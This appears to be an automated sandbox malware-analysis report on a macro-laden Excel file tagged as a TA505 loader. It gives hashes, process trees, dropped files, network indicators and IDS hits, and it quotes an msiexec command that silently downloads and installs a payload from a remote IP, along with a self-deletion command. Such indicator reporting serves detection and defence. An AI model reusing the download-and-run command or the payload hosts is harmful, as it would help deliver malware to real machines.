File name: 20180423 출납일보.xls

Full analysis: https://app.any.run/tasks/93979ff8-aff7-44b0-90b7-64ace04b5f41
Verdict: Malicious activity
Threats:
A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 23, 2019, 22:34:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, exe-to-msi, loader, ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Tue Apr 23 18:44:49 2019, Security: 0
MD5: 8ACF6C9298C8D9553A9F320AEB24D9C7
SHA1: 32D1EF20E74309A1E31A63E5B63DECECC33BC04C
SHA256: E82DB6A27D20F09E3023FE4D2D4A5F1BA0C2CDE7E88BCFB158244919E805E0ED
SSDEEP: 3072:uKpb8rGYrMPelwhKmFV5xtezEsgrdgncwPWsqPJjRpQAJr9FuPY9BF:uKpb8rGYrMPelwhKmFV5xtuEsgrdgn6/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Uses Microsoft Installer as loader
      • EXCEL.EXE (PID: 1360)
    • Unusual execution from Microsoft Office
      • EXCEL.EXE (PID: 1360)
    • Downloads executable files from IP
      • msiexec.exe (PID: 1488)
    • Downloads executable files from the Internet
      • msiexec.exe (PID: 1488)
    • Loads the Task Scheduler DLL interface
      • MSI7175.tmp (PID: 3564)
    • Loads the Task Scheduler COM API
      • MSI7175.tmp (PID: 3564)
    • Changes the autorun value in the registry
      • MSI7175.tmp (PID: 3564)
  • SUSPICIOUS
    • Executable content was dropped or overwritten
      • msiexec.exe (PID: 1488)
      • MSI7175.tmp (PID: 3564)
    • Drop ExeToMSI Application
      • msiexec.exe (PID: 1488)
    • Creates files in the program directory
      • MSI7175.tmp (PID: 3564)
    • Creates files in the Windows directory
      • MSI7175.tmp (PID: 3564)
    • Starts CMD.EXE for commands execution
      • MSI7175.tmp (PID: 3564)
  • INFO
    • Starts application with an unusual extension
      • msiexec.exe (PID: 1488)
    • Writes to a desktop.ini file (may be used to cloak folders)
      • msiexec.exe (PID: 1488)
    • Application was dropped or rewritten from another process
      • MSI7175.tmp (PID: 3564)
    • Reads Microsoft Office registry keys
      • EXCEL.EXE (PID: 1360)
No Malware configuration.

TRiD: .xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:23 17:44:49
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Sheets
  • 2
  • Excel 4.0 Macros
  • 2
No data.
All screenshots are available in the full report
Total processes: 39
Monitored processes: 5
Malicious processes: 3
Suspicious processes: 0

Behavior graph (interactive view in the full report; legend: start, drop and start): excel.exe (no specs), msiexec.exe (no specs), msiexec.exe, msi7175.tmp, cmd.exe (no specs)

Process information

PID 1360: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
  Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Excel
  Version: 14.0.6024.1000

PID 596: msiexec.exe STOP=1 /i http://27.102.118.143/dom1 /q ksw='%TEMP%'
  Path: C:\Windows\system32\msiexec.exe
  Parent process: EXCEL.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows® installer
  Exit code: 0
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 1488: C:\Windows\system32\msiexec.exe /V
  Path: C:\Windows\system32\msiexec.exe
  Parent process: services.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Windows® installer
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 3564: "C:\Windows\Installer\MSI7175.tmp"
  Path: C:\Windows\Installer\MSI7175.tmp
  Parent process: msiexec.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3616: "C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI7175.tmp >> NUL
  Path: C:\Windows\system32\cmd.exe
  Parent process: MSI7175.tmp
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Total events: 6 721
Read events: 6 625
Write events: 0
Delete events: 0

Modification events: No data
Executable files: 3
Suspicious files: 6
Text files: 9
Unknown types: 3

Dropped files

PID 1360 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\CVR5C16.tmp.cvr
PID 1488 (msiexec.exe): C:\Users\admin\AppData\Local\Temp\~DF0915C90E95DAFFC5.TMP
PID 1488 (msiexec.exe): C:\Config.Msi\e6fde.rbs
PID 1488 (msiexec.exe): C:\Users\admin\AppData\Local\Temp\~DF3F2EFF3B71DE26F9.TMP
PID 1360 (EXCEL.EXE): C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\query[1].asmx
PID 3564 (MSI7175.tmp): C:\ProgramData\Microsofts HeIp\wsus.exe (type: executable)
  MD5: 344D62CDE7BB83D5C12377BA8608D9A6
  SHA256: 1940A581E3D54481D4D45AD45AB92E713F8A6291DCD582AD1D382D6DE9967FE8
PID 1488 (msiexec.exe): C:\Windows\Installer\e6fdd.ipi (type: binary)
  MD5: 06C46E5F06D9B149FC91D56C38984EAC
  SHA256: 2F54C2627981D1DD032F676EC148E0F8308B988CFBA93B0E142D5F77A160BC14
PID 1488 (msiexec.exe): C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat (type: dat)
  MD5: 7269B25FE8F6FDBF029742B41E422D2E
  SHA256: 2385A4A9A0340CCA5226D5EE68EC4F6D6C4AA593613FA59E4BD78AD7E10465E8
PID 1488 (msiexec.exe): C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\5V36IRNN\desktop.ini (type: ini)
  MD5: 4A3DEB274BB5F0212C2419D3D8D08612
  SHA256: 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
PID 1488 (msiexec.exe): C:\Windows\Installer\MSI6ADB.tmp (type: executable)
  MD5: 15524A83BFD4D2FDEE1239CC63113850
  SHA256: 50F300BF2E87A2063EEE32867B1D7F41F55F67CEC0B2F26D2D6766DCF7C459A6
HTTP(S) requests: 3
TCP/UDP connections: 4
DNS requests: 2
Threats: 0

HTTP requests

PID 3564, MSI7175.tmp: GET http://160.202.162.147/1.tmp
  IP: 160.202.162.147:80, CN: KR, Reputation: suspicious
PID 1488, msiexec.exe: GET http://27.102.118.143/dom1
  HTTP code: 200, IP: 27.102.118.143:80, CN: KR, Type: executable, Size: 156 Kb, Reputation: suspicious
PID/process not listed: GET http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={538F6C89-2AD5-4006-8154-C6670774E980}&build=14.0.6023
  HTTP code: 200, IP: 52.109.76.6:80, CN: IE, Type: xml, Size: 1.99 Kb, Reputation: whitelisted

Connections

PID 3564, MSI7175.tmp: 160.202.162.147:80, ASN: Korea Telecom, CN: KR, Reputation: suspicious
PID/process not listed: 52.109.120.29:443, Domain: rr.office.microsoft.com, ASN: Microsoft Corporation, CN: HK, Reputation: whitelisted
PID/process not listed: 52.109.76.6:80, Domain: office14client.microsoft.com, ASN: Microsoft Corporation, CN: IE, Reputation: whitelisted
PID 1488, msiexec.exe: 27.102.118.143:80, ASN: DAOU TECHNOLOGY, CN: KR, Reputation: suspicious

DNS requests

office14client.microsoft.com: 52.109.76.6 (whitelisted)
rr.office.microsoft.com: 52.109.120.29 (whitelisted)

Threats

PID 1488, msiexec.exe, Misc activity: SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
PID 1488, msiexec.exe, Potential Corporate Privacy Violation: POLICY [PTsecurity] Executable application_x-msi Download
PID 3564, MSI7175.tmp, A Network Trojan was detected: ET CURRENT_EVENTS MalDoc Request for Payload (TA505 Related)
1 ETPRO signature is available in the full report
Process: Message
MSI7175.tmp: C:\ProgramData\Microsofts HeIp\template_d9b318.DATAHASH
MSI7175.tmp: 1